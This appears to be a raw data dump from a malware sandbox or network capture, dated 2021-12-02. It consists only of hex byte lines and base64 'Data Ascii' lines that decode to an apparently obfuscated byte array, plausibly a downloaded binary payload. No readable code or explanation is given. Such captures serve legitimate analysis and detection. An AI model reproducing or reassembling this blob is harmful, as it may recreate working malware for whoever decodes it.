                                                                2021-12-02 20:47:22 UTC668INData Raw: 4c 47 42 45 4e 79 78 67 52 6a 6b 73 59 44 6b 35 4c 47 42 45 52 69 78 67 52 54 6b 73 59 45 49 7a 4c 47 41 31 52 69 78 67 52 54 4d 73 59 44 4a 47 4c 47 42 47 51 79 78 67 4d 7a 55 73 59 44 68 47 4c 47 42 46 4f 53 78 67 52 6b 59 73 59 45 55 79 4c 47 42 42 4e 79 78 67 52 6b 4d 73 59 44 59 32 4c 47 42 46 51 53 78 67 51 55 59 73 59 45 5a 44 4c 47 42 46 4e 69 78 67 51 6b 59 73 59 45 4d 32 4c 47 41 78 52 69 78 67 52 6b 55 73 59 44 4e 43 4c 47 42 47 52 43 78 67 52 44 45 73 59 45 4a 47 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 59 78 4c 47 41 7a 51 69 78 67 52 6b 51 73 59 44 5a 43 4c 47 42 43 52 69 78 67 52 54 41 73 59 45 4a 47 4c 47 42 47 51 53 78 67 4d 44 55 73 59 45 4a 47 4c 47 42 47 4d 53 78 67 52 55 59 73 59 45 59 79 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 4a
                                                                Data Ascii: LGBENyxgRjksYDk5LGBERixgRTksYEIzLGA1RixgRTMsYDJGLGBGQyxgMzUsYDhGLGBFOSxgRkYsYEUyLGBBNyxgRkMsYDY2LGBFQSxgQUYsYEZDLGBFNixgQkYsYEM2LGAxRixgRkUsYDNCLGBGRCxgRDEsYEJGLGBEMyxgN0YsYEYxLGAzQixgRkQsYDZCLGBCRixgRTAsYEJGLGBGQSxgMDUsYEJGLGBGMSxgRUYsYEYyLGA1QixgRkUsYDJ
                                                                2021-12-02 20:47:22 UTC684INData Raw: 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 46 42 4c 47 42 47 52 69 78 67 52 54 67 73 59 44 56 47 4c 47 42 47 52 69 78 67 4e 55 49 73 59 45 5a 44 4c 47 41 79 4d 79 78 67 4e 30 59 73 59 45 55 35 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 55 33 4c 47 41 7a 51 79 78 67 51 54 51 73 59 45 56 44 4c 47 42 45 51 53 78 67 4d 30 59 73 59 45 59 79 4c 47 42 42 4e 79 78 67 4d 30 59 73 59 45 59 34 4c 47 41 30 4e 79 78 67 52 6b 55 73 59 44 52 42 4c 47 42 47 51 53 78 67 52 54 51 73 59 45 4e 47 4c 47 41 33 51 53 78 67 52 6b 45 73 59 44 68 47 4c 47 42 47 52 53 78 67 4f 44 55 73 59 45 4a 47 4c 47 42 46 4d 43 78 67 52 44 45 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4f 45 59 73 59 45 5a 46 4c 47 41 33 52 43 78 67 52 55 59 73 59 45 56 46 4c 47 42 47 51 79 78 67 51 54 4d 73 59 44 64
                                                                Data Ascii: LGBFRixgRkUsYDFBLGBGRixgRTgsYDVGLGBGRixgNUIsYEZDLGAyMyxgN0YsYEU5LGAzRixgRkEsYDU3LGAzQyxgQTQsYEVDLGBEQSxgM0YsYEYyLGBBNyxgM0YsYEY4LGA0NyxgRkUsYDRBLGBGQSxgRTQsYENGLGA3QSxgRkEsYDhGLGBGRSxgODUsYEJGLGBFMCxgRDEsYEFGLGBGMSxgOEYsYEZFLGA3RCxgRUYsYEVFLGBGQyxgQTMsYDd
                                                                2021-12-02 20:47:22 UTC700INData Raw: 4c 47 41 33 4d 69 78 67 52 6b 45 73 59 44 45 77 4c 47 41 30 52 53 78 67 4d 30 51 73 59 44 59 31 4c 47 41 31 4d 43 78 67 52 6a 59 73 59 44 63 32 4c 47 41 32 52 53 78 67 51 54 4d 73 59 45 4a 45 4c 47 41 78 52 69 78 67 52 55 55 73 59 44 4e 47 4c 47 42 45 52 43 78 67 52 6a 6b 73 59 44 45 30 4c 47 41 32 51 69 78 67 51 6b 4d 73 59 45 5a 43 4c 47 42 47 4e 79 78 67 52 54 45 73 59 45 59 7a 4c 47 41 77 4d 43 78 67 4d 45 45 73 59 44 4a 45 4c 47 42 45 51 69 78 67 52 55 55 73 59 44 55 78 4c 47 41 31 4d 69 78 67 4d 44 59 73 59 45 49 34 4c 47 41 31 4d 43 78 67 4f 54 59 73 59 45 56 44 4c 47 42 45 4d 79 78 67 52 45 49 73 59 45 55 77 4c 47 42 47 4d 69 78 67 52 54 41 73 59 45 5a 46 4c 47 41 77 52 53 78 67 51 55 51 73 59 45 4d 33 4c 47 41 30 4d 69 78 67 52 6a 51 73 59 44 46
                                                                Data Ascii: LGA3MixgRkEsYDEwLGA0RSxgM0QsYDY1LGA1MCxgRjYsYDc2LGA2RSxgQTMsYEJELGAxRixgRUUsYDNGLGBERCxgRjksYDE0LGA2QixgQkMsYEZCLGBGNyxgRTEsYEYzLGAwMCxgMEEsYDJELGBEQixgRUUsYDUxLGA1MixgMDYsYEI4LGA1MCxgOTYsYEVDLGBEMyxgREIsYEUwLGBGMixgRTAsYEZFLGAwRSxgQUQsYEM3LGA0MixgRjQsYDF
                                                                2021-12-02 20:47:22 UTC716INData Raw: 4c 47 42 42 52 69 78 67 4e 44 45 73 59 44 59 30 4c 47 42 47 4f 43 78 67 4e 7a 4d 73 59 44 42 47 4c 47 42 47 52 69 78 67 52 44 45 73 59 45 4a 47 4c 47 42 46 4e 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 7a 4d 79 78 67 4e 30 55 73 59 44 68 45 4c 47 42 44 52 69 78 67 52 54 6b 73 59 45 51 31 4c 47 42 43 52 69 78 67 4e 6a 67 73 59 45 55 33 4c 47 41 78 52 69 78 67 52 6a 6b 73 59 44 4d 7a 4c 47 41 33 52 69 78 67 4f 45 51 73 59 44 64 47 4c 47 42 46 4e 43 78 67 4f 45 59 73 59 45 45 79 4c 47 42 45 4e 69 78 67 4e 30 59 73 59 45 52 42 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 45 4d 33 4c 47 42 47 52 69 78 67 4d 6a 4d 73 59 44 64 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42 47 4e 69 78 67 4d 55 59 73 59 45 59 35 4c 47 42 43 51 69 78 67 4e 55 55 73 59 44 4e
                                                                Data Ascii: LGBBRixgNDEsYDY0LGBGOCxgNzMsYDBGLGBGRixgRDEsYEJGLGBFNixgMUYsYEZELGAzMyxgN0UsYDhELGBDRixgRTksYEQ1LGBCRixgNjgsYEU3LGAxRixgRjksYDMzLGA3RixgOEQsYDdGLGBFNCxgOEYsYEEyLGBENixgN0YsYERBLGAzRixgRkEsYEM3LGBGRixgMjMsYDdGLGBGNixgQUYsYEYxLGBGNixgMUYsYEY5LGBCQixgNUUsYDN
                                                                2021-12-02 20:47:22 UTC732INData Raw: 4c 47 41 78 4f 43 78 67 4d 30 59 73 59 45 49 78 4c 47 41 77 4d 79 78 67 51 7a 49 73 59 44 4d 78 4c 47 42 43 52 69 78 67 51 7a 59 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4f 54 41 73 59 44 64 43 4c 47 41 78 4d 69 78 67 51 6b 51 73 59 45 4d 34 4c 47 42 45 52 53 78 67 51 54 4d 73 59 44 59 79 4c 47 41 79 4e 69 78 67 52 6a 45 73 59 44 67 35 4c 47 41 31 4d 43 78 67 4d 44 45 73 59 44 6b 30 4c 47 41 34 4e 53 78 67 51 6b 51 73 59 44 4d 77 4c 47 41 7a 4e 69 78 67 4e 6a 45 73 59 44 67 33 4c 47 41 32 4d 53 78 67 4e 45 45 73 59 45 59 32 4c 47 41 30 52 43 78 67 51 6a 51 73 59 45 51 77 4c 47 41 77 4d 79 78 67 4e 6b 55 73 59 44 68 47 4c 47 41 33 4d 53 78 67 4d 54 67 73 59 45 5a 43 4c 47 41 79 4e 79 78 67 52 44 49 73 59 44 67 30 4c 47 42 45 4e 69 78 67 4e 6a 49 73 59 44 45
                                                                Data Ascii: LGAxOCxgM0YsYEIxLGAwMyxgQzIsYDMxLGBCRixgQzYsYDZGLGBGRSxgOTAsYDdCLGAxMixgQkQsYEM4LGBERSxgQTMsYDYyLGAyNixgRjEsYDg5LGA1MCxgMDEsYDk0LGA4NSxgQkQsYDMwLGAzNixgNjEsYDg3LGA2MSxgNEEsYEY2LGA0RCxgQjQsYEQwLGAwMyxgNkUsYDhGLGA3MSxgMTgsYEZCLGAyNyxgRDIsYDg0LGBENixgNjIsYDE
                                                                2021-12-02 20:47:22 UTC748INData Raw: 4c 47 41 34 4e 69 78 67 52 6b 55 73 59 44 46 42 4c 47 42 43 52 69 78 67 51 6a 6b 73 59 44 63 77 4c 47 42 42 51 53 78 67 4e 54 6b 73 59 44 59 31 4c 47 42 45 51 79 78 67 52 54 63 73 59 45 51 78 4c 47 41 34 51 69 78 67 4f 44 63 73 59 44 5a 43 4c 47 42 42 4d 69 78 67 4d 6b 59 73 59 45 51 34 4c 47 41 33 4d 69 78 67 51 6a 45 73 59 45 56 45 4c 47 41 32 4d 69 78 67 52 44 45 73 59 44 49 31 4c 47 42 45 51 69 78 67 4d 6b 59 73 59 44 6b 32 4c 47 41 32 51 79 78 67 4f 44 63 73 59 44 49 78 4c 47 42 46 52 53 78 67 4e 7a 45 73 59 44 4a 43 4c 47 42 47 4e 69 78 67 4d 44 49 73 59 45 51 31 4c 47 41 32 4d 79 78 67 4d 54 51 73 59 45 4d 35 4c 47 41 78 4e 53 78 67 4f 45 59 73 59 44 67 35 4c 47 41 7a 52 43 78 67 4d 55 51 73 59 45 59 31 4c 47 41 32 4f 53 78 67 4d 6a 51 73 59 45 49
                                                                Data Ascii: LGA4NixgRkUsYDFBLGBCRixgQjksYDcwLGBBQSxgNTksYDY1LGBEQyxgRTcsYEQxLGA4QixgODcsYDZCLGBBMixgMkYsYEQ4LGA3MixgQjEsYEVELGA2MixgRDEsYDI1LGBEQixgMkYsYDk2LGA2QyxgODcsYDIxLGBFRSxgNzEsYDJCLGBGNixgMDIsYEQ1LGA2MyxgMTQsYEM5LGAxNSxgOEYsYDg5LGAzRCxgMUQsYEY1LGA2OSxgMjQsYEI
                                                                2021-12-02 20:47:22 UTC764INData Raw: 4c 47 41 77 4f 43 78 67 4d 45 51 73 59 44 59 30 4c 47 42 45 52 43 78 67 4e 44 6b 73 59 44 4d 30 4c 47 42 45 4e 69 78 67 4d 44 4d 73 59 45 5a 46 4c 47 41 30 51 79 78 67 4e 6a 51 73 59 44 41 33 4c 47 41 35 4e 43 78 67 4d 54 41 73 59 44 46 43 4c 47 41 79 4f 43 78 67 51 54 4d 73 59 44 45 32 4c 47 41 79 4f 53 78 67 4e 7a 55 73 59 44 4d 32 4c 47 42 45 4d 43 78 67 52 54 67 73 59 44 46 42 4c 47 42 44 4d 43 78 67 51 7a 41 73 59 44 6b 34 4c 47 41 34 51 79 78 67 4d 6b 55 73 59 44 45 31 4c 47 41 32 4f 53 78 67 4d 54 4d 73 59 44 42 45 4c 47 42 44 52 69 78 67 4e 30 4d 73 59 45 4e 43 4c 47 42 47 52 43 78 67 4d 54 6b 73 59 45 5a 45 4c 47 41 79 52 53 78 67 52 6b 55 73 59 45 59 35 4c 47 41 79 52 53 78 67 4e 7a 4d 73 59 45 49 79 4c 47 41 31 4d 43 78 67 4e 55 4d 73 59 44 49
                                                                Data Ascii: LGAwOCxgMEQsYDY0LGBERCxgNDksYDM0LGBENixgMDMsYEZFLGA0QyxgNjQsYDA3LGA5NCxgMTAsYDFCLGAyOCxgQTMsYDE2LGAyOSxgNzUsYDM2LGBEMCxgRTgsYDFBLGBDMCxgQzAsYDk4LGA4QyxgMkUsYDE1LGA2OSxgMTMsYDBELGBDRixgN0MsYENCLGBGRCxgMTksYEZELGAyRSxgRkUsYEY5LGAyRSxgNzMsYEIyLGA1MCxgNUMsYDI
                                                                2021-12-02 20:47:22 UTC780INData Raw: 4c 47 42 43 52 69 78 67 51 30 49 73 59 44 64 47 4c 47 41 79 52 53 78 67 4d 6a 63 73 59 44 49 79 4c 47 42 47 52 53 78 67 4f 54 49 73 59 44 63 34 4c 47 41 7a 4e 43 78 67 52 6a 67 73 59 44 46 46 4c 47 41 78 4d 69 78 67 4e 6a 63 73 59 45 59 79 4c 47 41 31 51 79 78 67 51 7a 59 73 59 44 46 47 4c 47 41 7a 4e 79 78 67 52 6a 4d 73 59 44 49 35 4c 47 42 45 51 53 78 67 51 30 4d 73 59 44 59 30 4c 47 42 43 51 69 78 67 4d 55 51 73 59 44 41 30 4c 47 42 45 4d 53 78 67 4f 44 4d 73 59 45 55 79 4c 47 41 33 52 69 78 67 51 6b 45 73 59 45 46 44 4c 47 41 34 4d 53 78 67 52 54 67 73 59 44 55 34 4c 47 42 45 4d 53 78 67 4e 6a 55 73 59 44 41 79 4c 47 42 44 4d 79 78 67 52 54 41 73 59 44 4a 44 4c 47 41 7a 4d 79 78 67 4d 6b 49 73 59 45 59 78 4c 47 41 78 4f 53 78 67 52 54 59 73 59 45 59
                                                                Data Ascii: LGBCRixgQ0IsYDdGLGAyRSxgMjcsYDIyLGBGRSxgOTIsYDc4LGAzNCxgRjgsYDFFLGAxMixgNjcsYEYyLGA1QyxgQzYsYDFGLGAzNyxgRjMsYDI5LGBEQSxgQ0MsYDY0LGBCQixgMUQsYDA0LGBEMSxgODMsYEUyLGA3RixgQkEsYEFDLGA4MSxgRTgsYDU4LGBEMSxgNjUsYDAyLGBDMyxgRTAsYDJDLGAzMyxgMkIsYEYxLGAxOSxgRTYsYEY
                                                                2021-12-02 20:47:22 UTC796INData Raw: 4c 47 41 31 51 69 78 67 4f 44 41 73 59 45 56 46 4c 47 41 7a 51 79 78 67 4d 6a 67 73 59 45 45 78 4c 47 42 43 4d 43 78 67 51 6b 4d 73 59 44 49 7a 4c 47 41 35 4d 69 78 67 4d 6b 49 73 59 45 49 78 4c 47 41 78 4d 43 78 67 4d 7a 67 73 59 44 51 31 4c 47 41 7a 51 79 78 67 4e 54 49 73 59 44 59 30 4c 47 41 32 51 79 78 67 4d 54 41 73 59 45 4d 7a 4c 47 42 42 4d 79 78 67 52 55 59 73 59 44 56 45 4c 47 41 34 4e 69 78 67 52 6a 6b 73 59 44 68 44 4c 47 42 42 4f 53 78 67 4d 6b 59 73 59 44 6b 78 4c 47 41 79 51 69 78 67 52 6a 41 73 59 45 4d 78 4c 47 42 43 4f 43 78 67 4d 55 55 73 59 45 59 77 4c 47 41 7a 4e 79 78 67 51 7a 63 73 59 44 68 44 4c 47 42 46 52 69 78 67 52 44 4d 73 59 44 56 47 4c 47 41 77 4d 79 78 67 52 44 6b 73 59 44 6c 42 4c 47 41 32 4d 79 78 67 52 6b 55 73 59 44 42
                                                                Data Ascii: LGA1QixgODAsYEVFLGAzQyxgMjgsYEExLGBCMCxgQkMsYDIzLGA5MixgMkIsYEIxLGAxMCxgMzgsYDQ1LGAzQyxgNTIsYDY0LGA2QyxgMTAsYEMzLGBBMyxgRUYsYDVELGA4NixgRjksYDhDLGBBOSxgMkYsYDkxLGAyQixgRjAsYEMxLGBCOCxgMUUsYEYwLGAzNyxgQzcsYDhDLGBFRixgRDMsYDVGLGAwMyxgRDksYDlBLGA2MyxgRkUsYDB
                                                                2021-12-02 20:47:22 UTC812INData Raw: 4c 47 42 43 4d 53 78 67 51 7a 51 73 59 44 67 34 4c 47 41 77 4d 43 78 67 4d 44 51 73 59 45 49 79 4c 47 41 31 4f 43 78 67 4e 30 45 73 59 44 67 78 4c 47 41 79 51 79 78 67 51 6a 45 73 59 45 45 33 4c 47 41 31 4f 53 78 67 4f 45 59 73 59 44 45 31 4c 47 41 33 4f 53 78 67 4d 7a 59 73 59 44 45 78 4c 47 42 42 52 69 78 67 51 6a 45 73 59 44 4a 42 4c 47 42 44 4d 69 78 67 4d 54 55 73 59 45 49 79 4c 47 41 31 52 53 78 67 4d 6a 59 73 59 44 56 46 4c 47 41 35 52 53 78 67 51 54 45 73 59 45 4a 46 4c 47 42 47 4f 43 78 67 52 55 49 73 59 44 49 79 4c 47 41 7a 51 69 78 67 4d 54 67 73 59 45 45 31 4c 47 41 31 4f 53 78 67 4f 54 45 73 59 44 6b 31 4c 47 41 7a 4e 53 78 67 51 54 55 73 59 44 4e 45 4c 47 41 34 4e 69 78 67 4e 45 55 73 59 44 55 30 4c 47 42 47 51 53 78 67 51 30 51 73 59 45 51
                                                                Data Ascii: LGBCMSxgQzQsYDg4LGAwMCxgMDQsYEIyLGA1OCxgN0EsYDgxLGAyQyxgQjEsYEE3LGA1OSxgOEYsYDE1LGA3OSxgMzYsYDExLGBBRixgQjEsYDJBLGBDMixgMTUsYEIyLGA1RSxgMjYsYDVFLGA5RSxgQTEsYEJFLGBGOCxgRUIsYDIyLGAzQixgMTgsYEE1LGA1OSxgOTEsYDk1LGAzNSxgQTUsYDNELGA4NixgNEUsYDU0LGBGQSxgQ0QsYEQ
                                                                2021-12-02 20:47:22 UTC828INData Raw: 4c 47 42 44 4d 43 78 67 51 6b 59 73 59 45 4e 43 4c 47 41 78 51 79 78 67 4f 44 4d 73 59 44 67 33 4c 47 41 31 51 79 78 67 4e 6b 4d 73 59 44 49 77 4c 47 42 46 51 69 78 67 51 6a 4d 73 59 44 49 79 4c 47 41 30 4e 53 78 67 4d 45 59 73 59 45 49 31 4c 47 42 43 52 43 78 67 52 6a 51 73 59 44 49 34 4c 47 41 31 4d 53 78 67 51 54 41 73 59 44 63 34 4c 47 42 43 4f 43 78 67 52 6a 41 73 59 44 64 47 4c 47 41 7a 4d 53 78 67 4d 44 59 73 59 44 51 30 4c 47 41 7a 51 79 78 67 51 7a 67 73 59 45 4d 77 4c 47 41 33 52 43 78 67 51 30 45 73 59 44 55 32 4c 47 41 30 4e 69 78 67 4e 54 59 73 59 44 51 34 4c 47 42 43 4d 43 78 67 51 55 55 73 59 44 49 32 4c 47 41 33 4e 69 78 67 4e 54 59 73 59 45 49 79 4c 47 41 30 4e 79 78 67 4f 55 59 73 59 44 63 79 4c 47 41 77 52 69 78 67 4e 30 49 73 59 44 4a
                                                                Data Ascii: LGBDMCxgQkYsYENCLGAxQyxgODMsYDg3LGA1QyxgNkMsYDIwLGBFQixgQjMsYDIyLGA0NSxgMEYsYEI1LGBCRCxgRjQsYDI4LGA1MSxgQTAsYDc4LGBCOCxgRjAsYDdGLGAzMSxgMDYsYDQ0LGAzQyxgQzgsYEMwLGA3RCxgQ0EsYDU2LGA0NixgNTYsYDQ4LGBCMCxgQUUsYDI2LGA3NixgNTYsYEIyLGA0NyxgOUYsYDcyLGAwRixgN0IsYDJ
                                                                2021-12-02 20:47:22 UTC844INData Raw: 4c 47 42 45 4e 79 78 67 4f 44 59 73 59 45 4d 31 4c 47 42 43 51 69 78 67 4f 54 49 73 59 44 63 35 4c 47 41 7a 4e 69 78 67 4e 55 45 73 59 44 51 7a 4c 47 42 42 4d 69 78 67 4d 45 59 73 59 45 49 78 4c 47 41 7a 52 43 78 67 4e 45 55 73 59 44 46 47 4c 47 41 7a 52 43 78 67 52 54 41 73 59 45 4e 47 4c 47 41 34 51 79 78 67 4d 55 4d 73 59 44 67 7a 4c 47 41 35 52 53 78 67 4f 44 59 73 59 44 42 46 4c 47 42 44 4d 69 78 67 51 54 45 73 59 45 55 79 4c 47 42 43 4f 53 78 67 4e 44 45 73 59 44 68 47 4c 47 41 32 4d 53 78 67 4d 45 51 73 59 44 52 44 4c 47 41 32 51 79 78 67 51 6a 49 73 59 44 6b 35 4c 47 41 7a 51 69 78 67 4d 44 4d 73 59 45 51 35 4c 47 42 42 51 79 78 67 4e 30 4d 73 59 44 52 43 4c 47 42 42 4e 69 78 67 51 7a 55 73 59 45 51 35 4c 47 41 7a 4e 43 78 67 4e 30 4d 73 59 44 49
                                                                Data Ascii: LGBENyxgODYsYEM1LGBCQixgOTIsYDc5LGAzNixgNUEsYDQzLGBBMixgMEYsYEIxLGAzRCxgNEUsYDFGLGAzRCxgRTAsYENGLGA4QyxgMUMsYDgzLGA5RSxgODYsYDBFLGBDMixgQTEsYEUyLGBCOSxgNDEsYDhGLGA2MSxgMEQsYDRDLGA2QyxgQjIsYDk5LGAzQixgMDMsYEQ5LGBBQyxgN0MsYDRCLGBBNixgQzUsYEQ5LGAzNCxgN0MsYDI
                                                                2021-12-02 20:47:22 UTC860INData Raw: 4c 47 41 30 4d 69 78 67 4d 6a 55 73 59 44 46 42 4c 47 41 33 52 69 78 67 4d 30 55 73 59 45 5a 45 4c 47 41 34 4e 79 78 67 4e 30 55 73 59 45 4d 7a 4c 47 42 45 52 69 78 67 52 54 45 73 59 44 6c 47 4c 47 41 33 4d 69 78 67 4d 54 67 73 59 45 5a 47 4c 47 42 44 52 43 78 67 52 6b 59 73 59 45 51 77 4c 47 41 31 52 69 78 67 52 6a 41 73 59 44 46 47 4c 47 41 7a 52 43 78 67 4e 7a 51 73 59 44 51 34 4c 47 42 47 52 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 45 4d 43 78 67 4f 55 59 73 59 45 59 33 4c 47 41 34 4e 79 78 67 4f 54 63 73 59 44 5a 44 4c 47 41 30 52 69 78 67 4e 30 59 73 59 44 45 7a 4c 47 42 44 4e 69 78 67 52 54 55 73 59 44 59 33 4c 47 42 47 52 53 78 67 4d 6a 45 73 59 44 52 44 4c 47 42 44 4e 43 78 67 52 55 59 73 59 45 5a 43 4c 47 41 31 52 69 78 67 52 6b 55 73 59 44 63
                                                                Data Ascii: LGA0MixgMjUsYDFBLGA3RixgM0UsYEZELGA4NyxgN0UsYEMzLGBERixgRTEsYDlGLGA3MixgMTgsYEZGLGBDRCxgRkYsYEQwLGA1RixgRjAsYDFGLGAzRCxgNzQsYDQ4LGBGRCxgRkUsYEZGLGBEMCxgOUYsYEY3LGA4NyxgOTcsYDZDLGA0RixgN0YsYDEzLGBDNixgRTUsYDY3LGBGRSxgMjEsYDRDLGBDNCxgRUYsYEZCLGA1RixgRkUsYDc
                                                                2021-12-02 20:47:22 UTC876INData Raw: 4c 47 41 33 52 69 78 67 51 6a 59 73 59 45 59 77 4c 47 42 44 4e 69 78 67 52 45 59 73 59 45 5a 47 4c 47 41 35 51 69 78 67 52 6b 51 73 59 45 46 45 4c 47 42 43 52 69 78 67 4d 44 4d 73 59 45 5a 47 4c 47 42 47 4d 69 78 67 51 7a 63 73 59 45 46 44 4c 47 42 47 52 53 78 67 51 6a 63 73 59 44 64 47 4c 47 41 35 51 69 78 67 4e 30 59 73 59 45 59 35 4c 47 41 34 52 69 78 67 52 6b 55 73 59 45 56 44 4c 47 42 45 52 69 78 67 4e 55 59 73 59 44 59 32 4c 47 42 46 4e 79 78 67 4e 45 59 73 59 45 5a 46 4c 47 42 43 52 43 78 67 4e 30 55 73 59 44 51 32 4c 47 42 47 51 53 78 67 52 6b 45 73 59 45 4d 33 4c 47 42 47 52 53 78 67 51 54 63 73 59 45 4a 47 4c 47 42 47 4d 79 78 67 4d 7a 63 73 59 45 55 79 4c 47 41 31 52 69 78 67 4d 55 55 73 59 45 5a 46 4c 47 42 42 52 53 78 67 4f 44 55 73 59 45 4a
                                                                Data Ascii: LGA3RixgQjYsYEYwLGBDNixgREYsYEZGLGA5QixgRkQsYEFELGBCRixgMDMsYEZGLGBGMixgQzcsYEFDLGBGRSxgQjcsYDdGLGA5QixgN0YsYEY5LGA4RixgRkUsYEVDLGBERixgNUYsYDY2LGBFNyxgNEYsYEZFLGBCRCxgN0UsYDQ2LGBGQSxgRkEsYEM3LGBGRSxgQTcsYEJGLGBGMyxgMzcsYEUyLGA1RixgMUUsYEZFLGBBRSxgODUsYEJ
                                                                2021-12-02 20:47:22 UTC892INData Raw: 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41
                                                                Data Ascii: YDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDA
                                                                2021-12-02 20:47:22 UTC908INData Raw: 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41
                                                                Data Ascii: YDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDA
                                                                2021-12-02 20:47:22 UTC924INData Raw: 59 44 67 31 4c 47 41 78 4d 43 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6a 59 73 59 44 55 79 4c 47 41 31 4d 69 78 67 51 54 51 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 54 51 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 52 45 4c 47 41 7a 51 69 78 67 4d 30 49 73 59 44 63 32 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 45 34 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 32 4d 53 78 67 52 44 59 73 59 45 51 32 4c 47 42 43 4e 79 78 67 51 7a 63 73 59 44 67 31 4c 47 41 78 51 79 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 30 55 73 59 45 49 7a 4c 47 42 43 4d 79 78 67 4e 30 51 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 6a 41 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 64 43 4c 47 41 79 4f 53 78 67 4d 6a 6b
                                                                Data Ascii: YDg1LGAxMCxgRkMsYEZGLGBGRixgRjYsYDUyLGA1MixgQTQsYEM3LGA4NSxgMTQsYEZDLGBGRixgRkYsYDRELGAzQixgM0IsYDc2LGBDNyxgODUsYDE4LGBGQyxgRkYsYEZGLGA2MSxgRDYsYEQ2LGBCNyxgQzcsYDg1LGAxQyxgRkMsYEZGLGBGRixgQ0UsYEIzLGBCMyxgN0QsYEM3LGA4NSxgMjAsYEZDLGBGRixgRkYsYDdCLGAyOSxgMjk
                                                                2021-12-02 20:47:22 UTC940INData Raw: 59 45 59 34 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 46 45 4c 47 41 78 4e 79 78 67 4d 55 49 73 59 44 45 79 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 45 55 77 4c 47 42 47 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 77 51 69 78 67 4d 45 51 73 59 44 41 35 4c 47 41 77 52 53 78 67 51 7a 63 73 59 44 67 31 4c 47 42 46 4e 43 78 67 52 6a 67 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 55 51 73 59 45 4d 33 4c 47 41 34 51 69 78 67 52 6a 49 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 52 54 67 73 59 45 59 34 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 49 35 4c 47 42 42 4f 43 78 67 51 6a 59 73 59 44 4a 45 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 45 56 44 4c 47 42 47 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 44 4f 43 78 67 51 54 6b 73 59 44 46 46 4c 47 41 78 4e 43 78 67 51 7a 63
